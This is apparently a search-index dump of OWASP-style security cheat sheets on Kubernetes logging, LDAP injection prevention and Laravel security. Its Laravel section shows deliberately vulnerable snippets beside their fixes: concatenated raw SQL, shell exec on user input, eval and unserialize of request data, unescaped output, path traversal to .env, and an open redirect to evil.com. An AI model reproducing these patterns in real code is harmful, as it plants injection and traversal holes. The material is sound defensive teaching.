apiVersion: v1\nkind: Pod\nmetadata:\n  name: example\nspec:\n  containers:\n  - name: example\n    image: busybox\n    args: [/bin/sh, -c, 'while true; do echo $(date); sleep 1; done']\n

To apply the manifest, run:

kubectl apply -f example.yaml\n

To take a look at the logs for this container, run:

kubectl logs <pod-name>\n

A pod manifest using a sidecar container to tail the application's log file is as follows:

apiVersion: v1\nkind: Pod\nmetadata:\n  name: example\nspec:\n  containers:\n  - name: example\n    image: busybox\n    args:\n    - /bin/sh\n    - -c\n    - >\n      while true;\n      do\n        echo \"$(date)\\n\" >> /var/log/example.log;\n        sleep 1;\n      done\n    volumeMounts:\n    - name: varlog\n      mountPath: /var/log\n  - name: sidecar\n    image: busybox\n    args: [/bin/sh, -c, 'tail -f /var/log/example.log']\n    volumeMounts:\n    - name: varlog\n      mountPath: /var/log\n  volumes:\n  - name: varlog\n    emptyDir: {}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-logging","title":"Node logging","text":"

When a container running on Kubernetes writes its logs to stdout or stderr streams, the container engine streams them to the logging driver configured in Kubernetes.

In most cases, these logs will end up in the /var/log/containers directory on your host. Docker supports multiple logging drivers but unfortunately, driver configuration is not supported via the Kubernetes API.

Once a container is terminated or restarted, kubelet stores its logs on the node. To prevent these files from consuming all of the host's storage, the Kubernetes node implements a log rotation mechanism. When a pod is evicted from the node, its containers are evicted along with their corresponding log files.

Depending on what operating system and additional services you\u2019re running on your host machine, you might need to take a look at additional logs. For example, systemd logs can be retrieved using the following command:

journalctl -u <service-name>\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#cluster-logging","title":"Cluster logging","text":"

On the level of the Kubernetes cluster itself, there is a long list of cluster components that can be logged, as well as additional data types that can be used (events, audit logs). Together, these different types of data can give you visibility into how Kubernetes is performing as a system.

Some of these components run in a container, and some of them run on the operating system level (in most cases, a systemd service). The systemd services write to journald, and components running in containers write logs to the /var/log directory, unless the container engine has been configured to stream logs differently.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#events","title":"Events","text":"

Kubernetes events can indicate any Kubernetes resource state changes and errors, such as exceeded resource quota or pending pods, as well as any informational messages.

The following command returns all events within a specific namespace:

kubectl get events -n <namespace>\n\nNAMESPACE LAST SEEN TYPE   REASON OBJECT MESSAGE\nkube-system  8m22s  Normal   Scheduled            pod/metrics-server-66dbbb67db-lh865                                       Successfully assigned kube-system/metrics-server-66dbbb67db-lh865 to aks-agentpool-42213468-1\nkube-system     8m14s               Normal    Pulling                   pod/metrics-server-66dbbb67db-lh865                                       Pulling image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m58s               Normal    Pulled                    pod/metrics-server-66dbbb67db-lh865                                       Successfully pulled image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m57s               Normal     Created                   pod/metrics-server-66dbbb67db-lh865                                       Created container metrics-server\nkube-system     7m57s               Normal    Started                   pod/metrics-server-66dbbb67db-lh865                                       Started container metrics-server\nkube-system     8m23s               Normal    SuccessfulCreate          replicaset/metrics-server-66dbbb67db             Created pod: metrics-server-66dbbb67db-lh865\n

The following command will show the latest events for this specific Kubernetes resource:

kubectl describe pod <pod-name>\n\nEvents:\n  Type    Reason     Age   From                               Message\n  ----    ------     ----  ----                               -------\n  Normal  Scheduled  14m   default-scheduler                  Successfully assigned kube-system/coredns-7b54b5b97c-dpll7 to aks-agentpool-42213468-1\n  Normal  Pulled     13m   kubelet, aks-agentpool-42213468-1  Container image \"aksrepos.azurecr.io/mirror/coredns:1.3.1\" already present on machine\n  Normal  Created    13m   kubelet, aks-agentpool-42213468-1  Created container coredns\n  Normal  Started    13m   kubelet, aks-agentpool-42213468-1  Started container coredns\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#final-thoughts","title":"Final thoughts","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#embed-security-earlier-into-the-container-lifecycle","title":"Embed security earlier into the container lifecycle","text":"

You must integrate security earlier into the container lifecycle and ensure alignment and shared goals between security and DevOps teams. Security can (and should) be an enabler that allows your developers and DevOps teams to confidently build and deploy applications that are production-ready for scale, stability and security.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-native-security-controls-to-reduce-operational-risk","title":"Use Kubernetes-native security controls to reduce operational risk","text":"

Leverage the native controls built into Kubernetes whenever available in order to enforce security policies so that your security controls don\u2019t collide with the orchestrator. Instead of using a third-party proxy or shim to enforce network segmentation, as an example, use Kubernetes network policies to ensure secure network communication.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#leverage-the-context-that-kubernetes-provides-to-prioritize-remediation-efforts","title":"Leverage the context that Kubernetes provides to prioritize remediation efforts","text":"

In sprawling Kubernetes environments, manually triaging security incidents and policy violations is time consuming.

For example, a deployment containing a vulnerability with severity score of 7 or greater should be moved up in remediation priority if that deployment contains privileged containers and is open to the Internet but moved down if it\u2019s in a test environment and supporting a non-critical app.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#references","title":"References","text":"

Master documentation - https://kubernetes.io

  1. 9 Kubernetes Security Best Practices Everyone Must Follow - https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow
  2. Security Best Practices for Kubernetes Deployment - https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment
  3. Securing a Cluster - https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster
  4. Kubernetes Security Best Practices - https://phoenixnap.com/kb/kubernetes-security-best-practices
  5. Kubernetes Security 101: Risks and 29 Best Practices - https://www.stackrox.com/post/2020/05/kubernetes-security-101
  6. 15 Kubernetes security best practice to secure your cluster - https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster
  7. The Ultimate Guide to Kubernetes Security - https://neuvector.com/container-security/kubernetes-security-guide
  8. A hacker's guide to Kubernetes security - https://techbeacon.com/enterprise-it/hackers-guide-kubernetes-security
  9. 11 Ways (Not) to Get Hacked - https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked
  10. 12 Kubernetes configuration best practices - https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server
  11. A Practical Guide to Kubernetes Logging - https://logz.io/blog/a-practical-guide-to-kubernetes-logging
  12. Kubernetes Web UI (Dashboard) - https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard
  13. Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware
  14. OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION - https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud
  15. Introducing Policy As Code: The Open Policy Agent (OPA) - https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa
  16. What service mesh provides - https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf
  17. Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1 - https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1
  18. Open Policy Agent: What Is OPA and How It Works (Examples) - https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works
  19. Send Kubernetes Metrics To Kibana and Elasticsearch - https://logit.io/sources/configure/kubernetes/
  20. Kubernetes Security Checklist - https://kubernetes.io/docs/concepts/security/security-checklist/
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html","title":"LDAP Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is focused on providing clear, simple, actionable guidance for preventing LDAP Injection flaws in your applications.

LDAP Injection is an attack used to exploit web-based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection.

LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree.

For more information on LDAP Injection attacks, visit LDAP injection.

LDAP injection attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.

Primary Defenses:

Additional Defenses:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-1-escape-all-variables-using-the-right-ldap-encoding-function","title":"Defense Option 1: Escape all variables using the right LDAP encoding function","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#distinguished-name-escaping","title":"Distinguished Name Escaping","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard\u00a0Feynman,\u00a0ou=Physics\u00a0Department,\u00a0dc=Caltech,\u00a0dc=edu

or

uid=inewton,\u00a0ou=Mathematics\u00a0Department,\u00a0dc=Cambridge,\u00a0dc=com

There are certain characters that are considered special characters in a DN.

The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces.

Some \"special\" characters that are allowed in Distinguished Names and do not need to be escaped include:

* ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! '\n
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#search-filter-escaping","title":"Search Filter Escaping","text":"

Each DN points to exactly 1 entry, which can be thought of like a row in an RDBMS. For each entry, there will be 1 or more attributes, which are analogous to RDBMS columns. If you are interested in searching through LDAP for users with certain attributes, you may do so with search filters.

In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation, also known as prefix notation.

Example:

(&(ou=Physics)(|\n(manager=cn=Freeman\u00a0Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert\u00a0Einstein,ou=Physics,dc=Princeton,dc=edu)\n))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping: encoding for LDAP search filters and encoding for LDAP DNs (distinguished names). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

Some \"special\" characters that are allowed in search filters and must be escaped include:

* ( ) \\ NUL\n

For more information on search filter escaping visit RFC4515.
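
As an illustration only (a hedged sketch, not part of the original cheat sheet), languages that ship an LDAP escaping helper can apply both forms of escaping described above. PHP, for example, provides the ldap_escape function (requires the LDAP extension) with LDAP_ESCAPE_FILTER and LDAP_ESCAPE_DN flags:

// Hedged sketch: escape untrusted input before placing it in a search filter or a DN\n$username = $_POST['username'] ?? '';\n\n// Escaping for a search filter (RFC4515-style \\XX escaping of * ( ) \\ and NUL)\n$filter = '(uid=' . ldap_escape($username, '', LDAP_ESCAPE_FILTER) . ')';\n\n// Escaping for use inside a distinguished name\n$dn = 'cn=' . ldap_escape($username, '', LDAP_ESCAPE_DN) . ',ou=People,dc=example,dc=com';\n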

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-java-escaping-example","title":"Safe Java Escaping Example","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-c-sharp-net-tba-example","title":"Safe C Sharp .NET TBA Example","text":"

.NET AntiXSS (now the Encoder class) has LDAP encoding functions including Encoder.LdapFilterEncode(string), Encoder.LdapDistinguishedNameEncode(string) and Encoder.LdapDistinguishedNameEncode(string, bool, bool).

Encoder.LdapFilterEncode encodes input according to RFC4515 where unsafe values are converted to \\XX where XX is the representation of the unsafe character.

Encoder.LdapDistinguishedNameEncode encodes input according to RFC2253 where unsafe characters are converted to #XX where XX is the representation of the unsafe character and the comma, plus, quote, slash, less than and greater than signs are escaped using slash notation (\\X). In addition, a space or octothorpe (#) at the beginning of the input string is escaped with \\, as is a space at the end of the string.

LdapDistinguishedNameEncode(string, bool, bool) is also provided so you may turn off the initial or final character escaping rules, for example if you are concatenating the escaped distinguished name fragment into the midst of a complete distinguished name.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-2-use-frameworks-that-automatically-protect-from-ldap-injection","title":"Defense Option 2: Use Frameworks that Automatically Protect from LDAP Injection","text":"

Safe .NET Example

LINQ to Active Directory provides automatic LDAP encoding when building LDAP queries.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-3-additional-defenses","title":"Defense Option 3: Additional Defenses","text":"

Beyond adopting one of the two primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful LDAP injection attack, you should minimize the privileges assigned to the LDAP binding account in your environment.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#enabling-bind-authentication","title":"Enabling Bind Authentication","text":"

If the LDAP protocol is configured with bind authentication, attackers would not be able to perform LDAP injection attacks because of the verification and authorization checks performed against valid credentials passed by the user. However, an attacker can still bypass bind authentication through an anonymous connection or by exploiting the use of unauthenticated bind: Anonymous Bind (LDAP) and Unauthenticated Bind (LDAP).

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-List Input Validation","text":"

Input validation can be used to detect unauthorized input before it is passed to the LDAP query. For more information please see the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html","title":"Laravel Cheat Sheet","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide security tips to developers building Laravel applications. It aims to cover all common vulnerabilities and how to ensure that your Laravel applications are secure.

The Laravel Framework provides in-built security features and is meant to be secure by default. However, it also provides additional flexibility for complex use cases. This means that developers unfamiliar with the inner workings of Laravel may fall into the trap of using complex features in a way that is not secure. This guide is meant to educate developers to avoid common pitfalls and develop Laravel applications in a secure manner.

You may also refer to the Enlightn Security Documentation, which highlights common vulnerabilities and good practices on securing Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#the-basics","title":"The Basics","text":"
APP_DEBUG=false\n
php artisan key:generate\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cookie-security-and-session-management","title":"Cookie Security and Session Management","text":"

By default, Laravel is configured in a secure manner. However, if you change your cookie or session configurations, make sure of the following:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        \\App\\Http\\Middleware\\EncryptCookies::class,\n        ...\n    ],\n    ...\n];\n
'http_only' => true,\n
'domain' => null,\n
'same_site' => 'lax',\n
'secure' => null,\n
'lifetime' => 15,\n

You may also refer to the Cookie Security Guide to learn more about cookie security and the cookie attributes mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#authentication","title":"Authentication","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#guards-and-providers","title":"Guards and Providers","text":"

At its core, Laravel's authentication facilities are made up of \"guards\" and \"providers\". Guards define how users are authenticated for each request. Providers define how users are retrieved from your persistent storage.

Laravel ships with a session guard which maintains state using session storage and cookies, and a token guard for API tokens.

For providers, Laravel ships with an eloquent provider for retrieving users using the Eloquent ORM and a database provider for retrieving users using the database query builder.

Guards and providers can be configured in the config/auth.php file. Laravel offers the ability to build custom guards and providers as well.
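
As a rough illustration (a sketch modeled on Laravel's default configuration; your guard and provider names may differ), config/auth.php ties guards to providers like this:

// config/auth.php (simplified sketch of the defaults)\nreturn [\n    'defaults' => ['guard' => 'web', 'passwords' => 'users'],\n\n    'guards' => [\n        // Session guard: state maintained via session storage and cookies\n        'web' => ['driver' => 'session', 'provider' => 'users'],\n    ],\n\n    'providers' => [\n        // Eloquent provider: users retrieved through the Eloquent ORM\n        'users' => ['driver' => 'eloquent', 'model' => App\\Models\\User::class],\n    ],\n];\n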

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#starter-kits","title":"Starter Kits","text":"

Laravel offers a wide variety of first party application starter kits that include in-built authentication features:

  1. Laravel Breeze: A simple, minimal implementation of all Laravel's authentication features including login, registration, password reset, email verification and password confirmation.
  2. Laravel Fortify: A headless authentication backend that includes the above authentication features along with two-factor authentication.
  3. Laravel Jetstream: An application starter kit that provides a UI on top of Laravel Fortify's authentication features.

It is recommended to use one of these starter kits to ensure robust and secure authentication for your Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#api-authentication-packages","title":"API Authentication Packages","text":"

Laravel also offers the following API authentication packages:

  1. Passport: An OAuth2 authentication provider.
  2. Sanctum: An API token authentication provider.

Starter kits such as Fortify and Jetstream have in-built support for Sanctum.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#mass-assignment","title":"Mass Assignment","text":"

Mass assignment is a common vulnerability in modern web applications that use an ORM like Laravel's Eloquent ORM.

A mass assignment vulnerability occurs when an ORM pattern is abused to modify data items that the user should not normally be allowed to modify.

Consider the following code:

Route::any('/profile', function (Request $request) {\n    $request->user()->forceFill($request->all())->save();\n\n    $user = $request->user()->fresh();\n\n    return response()->json(compact('user'));\n})->middleware('auth');\n

The above profile route allows the logged-in user to change their profile information.

However, let's say there is an is_admin column in the users table. You probably do not want the user to be allowed to change the value of this column. However, the above code allows users to change any column values for their row in the users table. This is a mass assignment vulnerability.

Laravel has in-built features by default to protect against this vulnerability. Make sure of the following to stay secure:
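
As an illustration (a hedged sketch, not the cheat sheet's own checklist), one common protection is to avoid forceFill with $request->all() and instead fill only validated fields, combined with the model's $fillable allow-list:

// app/Models/User.php (sketch): only these attributes may be mass assigned\nuse Illuminate\\Foundation\\Auth\\User as Authenticatable;\n\nclass User extends Authenticatable\n{\n    protected $fillable = ['name', 'email'];\n}\n\n// Route (sketch): fill only validated, expected fields instead of $request->all()\nRoute::any('/profile', function (Request $request) {\n    $data = $request->validate(['name' => 'string|max:255', 'email' => 'email']);\n\n    $request->user()->fill($data)->save();\n\n    return response()->json(['user' => $request->user()->fresh()]);\n})->middleware('auth');\n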

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

SQL Injection attacks are unfortunately quite common in modern web applications and entail attackers providing malicious request input data to interfere with SQL queries. This guide covers SQL injection and how it can be prevented specifically for Laravel applications. You may also refer to the SQL Injection Prevention Cheatsheet for more information that is not specific to Laravel.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#eloquent-orm-sql-injection-protection","title":"Eloquent ORM SQL Injection Protection","text":"

By default, Laravel's Eloquent ORM protects against SQL injection by parameterizing queries and using SQL bindings. For instance, consider the following query:

use App\\Models\\User;\n\nUser::where('email', $email)->get();\n

The code above fires the query below:

select * from `users` where `email` = ?\n

So, even if $email is untrusted user input data, you are protected from SQL injection attacks.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#raw-query-sql-injection","title":"Raw Query SQL Injection","text":"

Laravel also offers raw query expressions and raw queries to construct complex or database-specific queries that aren't supported out of the box.

While this is great for flexibility, you must be careful to always use SQL data bindings for such queries. Consider the following query:

use Illuminate\\Support\\Facades\\DB;\nuse App\\Models\\User;\n\nUser::whereRaw('email = \"'.$request->input('email').'\"')->get();\nDB::table('users')->whereRaw('email = \"'.$request->input('email').'\"')->get();\n

Both lines of code actually execute the same query, which is vulnerable to SQL injection as the query does not use SQL bindings for untrusted user input data.

The code above fires the following query:

select * from `users` where `email` = \"value of email query parameter\"\n

Always remember to use SQL bindings for request data. We can fix the above code by making the following modification:

use App\\Models\\User;\n\nUser::whereRaw('email = ?', [$request->input('email')])->get();\n

We can even use named SQL bindings like so:

use App\\Models\\User;\n\nUser::whereRaw('email = :email', ['email' => $request->input('email')])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#column-name-sql-injection","title":"Column Name SQL Injection","text":"

You must never allow user input data to dictate column names referenced by your queries.

The following queries may be vulnerable to SQL injection:

use App\\Models\\User;\n\nUser::where($request->input('colname'), 'somedata')->get();\nUser::query()->orderBy($request->input('sortBy'))->get();\n

It is important to note that even though Laravel has some in-built features, such as wrapping column names, to protect against the above SQL injection vulnerabilities, some database engines (depending on versions and configurations) may still be vulnerable because databases do not support binding column names.

At the very least, this may result in a mass assignment vulnerability rather than SQL injection: you may have expected a certain set of column values, but because they are not validated here, the user is free to use other columns as well.

Always validate user input for such situations like so:

use App\\Models\\User;\n\n$request->validate(['sortBy' => 'in:price,updated_at']);\nUser::query()->orderBy($request->validated()['sortBy'])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#validation-rule-sql-injection","title":"Validation Rule SQL Injection","text":"

Certain validation rules have the option of providing database column names. Such rules are vulnerable to SQL injection in the same manner as column name SQL injection because they construct queries in a similar manner.

For example, the following code may be vulnerable:

use Illuminate\\Validation\\Rule;\n\n$request->validate([\n    'id' => Rule::unique('users')->ignore($id, $request->input('colname'))\n]);\n

Behind the scenes, the above code triggers the following query:

use App\\Models\\User;\n\n$colname = $request->input('colname');\nUser::where($colname, $request->input('id'))->where($colname, '<>', $id)->count();\n

Since the column name is dictated by user input, it is similar to column name SQL injection.
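
A hedged sketch of one possible fix (assuming the set of permissible column names is known up front) is to validate the column name against an allow-list before building the rule, mirroring the approach shown for order-by columns above:

use Illuminate\\Validation\\Rule;\n\n// Sketch: accept only known column names before building the unique rule\n$request->validate(['colname' => 'required|in:username,email']);\n\n$request->validate([\n    'id' => Rule::unique('users')->ignore($id, $request->input('colname')),\n]);\n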

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross Site Scripting (XSS)","text":"

XSS attacks are injection attacks where malicious scripts (such as JavaScript code snippets) are injected into trusted websites.

Laravel's Blade templating engine has echo statements {{ }} that automatically escape variables using the htmlspecialchars PHP function to protect against XSS attacks.

Laravel also offers the ability to display unescaped data using the unescaped syntax {!! !!}. This must not be used on any untrusted data; otherwise, your application will be subject to an XSS attack.

For instance, if you have something like this in any of your Blade templates, it would result in a vulnerability:

{!! request()->input('somedata') !!}\n

This, however, is safe to do:

{{ request()->input('somedata') }}\n

For other information on XSS prevention that is not specific to Laravel, you may refer to the Cross Site Scripting Prevention Cheatsheet.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#unrestricted-file-uploads","title":"Unrestricted File Uploads","text":"

Unrestricted file upload attacks entail attackers uploading malicious files to compromise web applications. This section describes how to protect against such attacks while building Laravel applications. You may also refer to the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#always-validate-file-type-and-size","title":"Always Validate File Type and Size","text":"

Always validate the file type (extension or MIME type) and file size to avoid storage DOS attacks and remote code execution:

$request->validate([\n    'photo' => 'file|size:100|mimes:jpg,bmp,png'\n]);\n

Storage DOS attacks exploit missing file size validations and upload massive files to cause a denial of service (DOS) by exhausting the disk space.

Remote code execution attacks entail first uploading malicious executable files (such as PHP files) and then triggering their malicious code by visiting the file URL (if public).

Both these attacks can be avoided by simple file validations as mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#do-not-rely-on-user-input-to-dictate-filenames-or-path","title":"Do Not Rely On User Input To Dictate Filenames or Path","text":"

If your application allows user controlled data to construct the path of a file upload, this may result in overwriting a critical file or storing the file in a bad location.

Consider the following code:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), $request->input('filename'));\n\n    return back();\n});\n

This route saves a file to a directory specific to a user ID. Here, we rely on the filename user input data, and this may result in a vulnerability as the filename could be something like ../2/filename.pdf. This would store the file in user ID 2's directory instead of the directory pertaining to the currently logged-in user.

To fix this, we should use the basename PHP function to strip out any directory information from the filename input data:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), basename($request->input('filename')));\n\n    return back();\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#avoid-processing-zip-or-xml-files-if-possible","title":"Avoid Processing ZIP or XML Files If Possible","text":"

XML files can expose your application to a wide variety of attacks such as XXE attacks, the billion laughs attack and others. If you process ZIP files, you may be exposed to zip bomb DOS attacks.

Refer to the XML Security Cheatsheet and the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#path-traversal","title":"Path Traversal","text":"

A path traversal attack aims to access files by manipulating request input data with ../ sequences and variations or by using absolute file paths.

If you allow users to download files by filename, you may be exposed to this vulnerability if input data is not stripped of directory information.

Consider the following code:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').$request->input('filename'));\n});\n

Here, the filename is not stripped of directory information, so a malformed filename such as ../../.env could expose your application credentials to potential attackers.

Similar to unrestricted file uploads, you should use the basename PHP function to strip out directory information like so:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').basename($request->input('filename')));\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#open-redirection","title":"Open Redirection","text":"

Open Redirection attacks in themselves are not that dangerous, but they enable phishing attacks.

Consider the following code:

Route::get('/redirect', function (Request $request) {\n   return redirect($request->input('url'));\n});\n

This code redirects the user to any external URL provided by user input. This could enable attackers to create seemingly safe URLs like https://example.com/redirect?url=http://evil.com. For instance, attackers may use a URL of this type to spoof password reset emails and lead victims to expose their credentials on the attacker's website.
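
As a hedged sketch of one possible mitigation (other approaches, such as redirecting only to named routes or signed URLs, are equally valid; this assumes PHP 8's str_starts_with is available), the redirect target can be restricted to relative paths within the application:

Route::get('/redirect', function (Request $request) {\n    $url = $request->input('url', '/');\n\n    // Sketch: allow only relative paths; reject absolute and protocol-relative URLs\n    if (!str_starts_with($url, '/') || str_starts_with($url, '//')) {\n        $url = '/';\n    }\n\n    return redirect($url);\n});\n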

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-request-forgery-csrf","title":"Cross Site Request Forgery (CSRF)","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated.

Laravel provides CSRF protection out-of-the-box with the VerifyCsrfToken middleware. Generally, if you have this middleware in the web middleware group of your App\\Http\\Kernel class, you should be well protected:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        ...\n         \\App\\Http\\Middleware\\VerifyCsrfToken::class,\n         ...\n    ],\n];\n

Next, for all your POST request forms, you may use the @csrf blade directive to generate the hidden CSRF input token fields:

<form method=\"POST\" action=\"/profile\">\n    @csrf\n\n    <!-- Equivalent to... -->\n    <input type=\"hidden\" name=\"_token\" value=\"{{ csrf_token() }}\" />\n</form>\n

For AJAX requests, you can set up the X-CSRF-Token header.

Laravel also provides the ability to exclude certain routes from CSRF protection using the $except variable in your CSRF middleware class. Typically, you would want to exclude only stateless routes (e.g. APIs or webhooks) from CSRF protection. If any other routes are excluded, these may result in CSRF vulnerabilities.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Command Injection vulnerabilities involve executing shell commands constructed with unescaped user input data.

For example, the following code performs a whois on a user provided domain name:

public function verifyDomain(Request $request)\n{\n    exec('whois '.$request->input('domain'));\n}\n

The above code is vulnerable as the user data is not escaped properly. To escape user input for shell commands, you may use the escapeshellcmd and/or escapeshellarg PHP functions.
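
A minimal sketch of the fix, assuming the value really must be passed to a shell command, is to wrap the untrusted input with escapeshellarg so it is treated as a single quoted argument:

public function verifyDomain(Request $request)\n{\n    // Sketch: escapeshellarg quotes the value so it cannot inject extra shell commands\n    exec('whois ' . escapeshellarg($request->input('domain')), $output);\n\n    return $output;\n}\n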

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#other-injections","title":"Other Injections","text":"

Object injection, eval code injection and extract variable hijacking attacks involve unserializing, evaluating or using the extract function on untrusted user input data.

Some examples are:

unserialize($request->input('data'));\neval($request->input('data'));\nextract($request->all());\n

In general, avoid passing any untrusted input data to these dangerous functions.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

You should consider adding the following security headers to your web server or Laravel application middleware:

For more information, refer to the OWASP Secure Headers Project.
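
As a rough sketch (the header names and values below are common choices, not a list prescribed by this cheat sheet), a Laravel middleware can attach security headers to every response:

namespace App\\Http\\Middleware;\n\nuse Closure;\n\nclass SecurityHeaders\n{\n    // Sketch: attach commonly recommended security headers to each response\n    public function handle($request, Closure $next)\n    {\n        $response = $next($request);\n\n        $response->headers->set('X-Frame-Options', 'DENY');\n        $response->headers->set('X-Content-Type-Options', 'nosniff');\n        $response->headers->set('Referrer-Policy', 'no-referrer-when-downgrade');\n        $response->headers->set('Strict-Transport-Security', 'max-age=31536000; includeSubDomains');\n\n        return $response;\n    }\n}\n

Such a middleware would still need to be registered, for example in the web middleware group of App\\Http\\Kernel, before it takes effect.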

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#tools","title":"Tools","text":"

You should consider using Enlightn, a static and dynamic analysis tool for Laravel applications that has over 45 automated security checks to identify potential security issues. There is both an open source version and a commercial version of Enlightn available. Enlightn also includes extensive documentation (45 pages) on security vulnerabilities, and a great way to learn more about Laravel security is simply to review this documentation.

You should also use the Enlightn Security Checker or the Local PHP Security Checker. Both of them are open source packages, licensed under the MIT and AGPL licenses respectively, that scan your PHP dependencies for known vulnerabilities using the Security Advisories Database.

